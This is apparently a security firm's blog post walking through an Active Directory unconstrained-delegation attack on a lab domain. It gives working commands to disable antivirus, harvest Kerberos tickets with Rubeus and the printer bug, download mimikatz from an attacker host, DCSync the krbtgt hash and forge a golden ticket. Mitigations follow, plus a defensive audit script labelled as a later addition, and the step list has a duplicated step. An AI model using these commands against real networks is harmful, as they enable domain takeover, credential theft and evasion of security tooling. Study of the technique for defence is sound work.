Practical Demo of the Unconstrained Delegation Attack

There have been many publications explaining various ways to attack unconstrained delegation. This post practically shows how such a misconfiguration can be exploited easily and effectively. To understand this kind of attack in more depth, check out the resources at the bottom.

Let’s get started:


To perform this kind of attack:

  1. Gain access to a domain controller (DCB) in ForestB.
  2. Monitor for logon events through the LSA API with Rubeus.exe.
  3. Use MS-RPRN.exe to trigger the "printer bug" against DCA.
  4. Trigger the MS-RPRN "printer bug" against a domain controller (e.g. DCA) in ForestA.
  5. Harvest a Ticket Granting Ticket (TGT) with Rubeus.exe.
  6. Perform a DCSync attack to retrieve the krbtgt credentials.
  7. Forge a golden ticket.
  8. The domain controller (DCA) in ForestA is compromised.

Practical Demo:

Checking the hostname

We can see we are now logged in to DB-SERVER.

List the Windows servers on the domain that are candidates for the unconstrained Kerberos delegation check using the command (the -notlike pattern needs wildcards, otherwise it excludes nothing):

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders

Error due to GET-ADComputer not being recognised

Let's install the Active Directory module for PowerShell. The AD module is already installed on domain controllers, but on member servers you can add it as a feature in Server Manager or with the PowerShell command below:

get-windowsfeature | where name -like RSAT-AD-PowerShell | Install-WindowsFeature

Modules installed successfully

Now retry the previous command to list the candidate servers on the domain:

Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "*2016*") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders

2 servers found

We check whether our server DB-SERVER has TrustedForDelegation set to TRUE (primaryGroupID 515 restricts the query to member computers). If yes, we can start our attack:

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

TrustedForDelegation set to TRUE

Attack time:

Have two shells open (let's call them shell 1 and shell 2) so that you can run Rubeus.exe and MS-RPRN.exe simultaneously.

2 shells spawned

Disable real-time AV monitoring from the shell with the command:

Set-MpPreference -DisableRealtimeMonitoring $true

Upload MS-RPRN.exe and Rubeus.exe.

uploading MS-RPRN AND Rubeus.exe

In the shell on the left (port 2222), use Rubeus to harvest TGTs every 3 seconds with the command:

Rubeus.exe harvest /interval:3

TGT Harvested

And in the shell on the right (port 3333), use MS-RPRN to request the TGTs:

c:\Users\Public\MS-RPRN.exe \\OPS-CHILDDC.operations.atomic.site \\DB-SERVER.operations.atomic.site

\\OPS-CHILDDC.operations.atomic.site is the domain controller we want to compromise.

\\DB-SERVER.operations.atomic.site is the machine with delegation enabled that we control.

Trigger the MS-RPRN

Remove the spaces from the captured ticket and save it into a file.

hash file

Pass the ticket with Rubeus.exe:

Rubeus.exe ptt /ticket:hash

Let's list the user's Kerberos tickets with klist (klist purge clears them without logging off):

klist

Purge User Kerberos Ticket without Logoff

To perform a DCSync attack, we must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.

Upload mimikatz to the target. Remember we already disabled real-time monitoring at the start of our attack:

powershell.exe Invoke-WebRequest -Uri 'http://my-ip-here/mimikatz.exe' -OutFile mimikatz.exe

mimikatz.exe "privilege::debug" "lsadump::dcsync /user:OPERATIONS\krbtgt" exit

Krbtgt NTLM Hash and SID Extracted

Let's forge a golden ticket:

kerberos::golden /User:administrator /domain:OPS-CHILDDC.operations.atomic.site /sid:S-1-5-21-3757735274-1965336150-1982876978 /krbtgt:8e2b8effbf6735b8fb5be206cb3dfead /startoffset:0 /endin:600 /renewmax:10080 /ptt

Forging a golden ticket

We can now view shared directories on our target domain controller:

dir \\OPS-CHILDDC.operations.atomic.site\C$

Share directory (\C$)

Mitigations for Unconstrained Delegation:

Replace unconstrained delegation with constrained delegation, which limits the SPNs the computer is allowed to delegate to, and make sure no non-domain-controller host keeps TrustedForDelegation set.

Placing privileged users in the Protected Users group prevents them from being used in delegation and keeps their TGTs off these computers after they authenticate. The "Account is sensitive and cannot be delegated" option on the account has the same effect.
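The following audit script is an added example for defenders and is not part of the original post. It assumes the ActiveDirectory RSAT module is available and the caller can read the domain; the -Fix switch additionally needs rights to modify the flagged accounts. It finds non-DC computers with unconstrained delegation (the setting abused above) and privileged accounts that are still delegatable.

```powershell
# Added defensive audit example (not from the original post). Assumes the
# ActiveDirectory module and an account with read rights on the domain;
# -Fix requires rights to change the userAccountControl of flagged users.
param([switch]$Fix)
Import-Module ActiveDirectory

# 1. Computers with the TRUSTED_FOR_DELEGATION bit (0x80000) in userAccountControl.
#    Domain controllers legitimately carry it, so exclude primaryGroupID 516.
$unconstrained = Get-ADComputer `
    -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=524288)' `
    -Properties primaryGroupID |
    Where-Object { $_.primaryGroupID -ne 516 }
foreach ($c in $unconstrained) {
    Write-Warning "Unconstrained delegation on non-DC host: $($c.DNSHostName)"
}

# 2. Privileged accounts whose TGT could be harvested on such a host:
#    they should be in Protected Users or marked 'Account is sensitive and cannot be delegated'.
$protected  = (Get-ADGroupMember 'Protected Users' -Recursive).distinguishedName
$privGroups = 'Domain Admins', 'Enterprise Admins', 'Administrators'
$exposed = foreach ($g in $privGroups) {
    # Enterprise Admins lives in the forest root, so the lookup may fail in a child domain.
    Get-ADGroupMember $g -Recursive -ErrorAction SilentlyContinue |
        Where-Object objectClass -eq 'user' |
        Get-ADUser -Properties AccountNotDelegated |
        Where-Object { -not $_.AccountNotDelegated -and
                       $protected -notcontains $_.distinguishedName }
}
foreach ($u in ($exposed | Sort-Object distinguishedName -Unique)) {
    Write-Warning "Privileged account is delegatable: $($u.SamAccountName)"
    if ($Fix) {
        # Sets the NOT_DELEGATED flag; Protected Users membership is a separate, deliberate change.
        Set-ADAccountControl -Identity $u -AccountNotDelegated $true
    }
}
```

Run it without -Fix first and review the warnings; hosts like DB-SERVER in the demo would appear in the first list.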

Resources:

https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

You can also check out our services on: https://www.inveteckglobal.com/

Ghana’s #1 practical cyber security company https://inveteckglobal.com
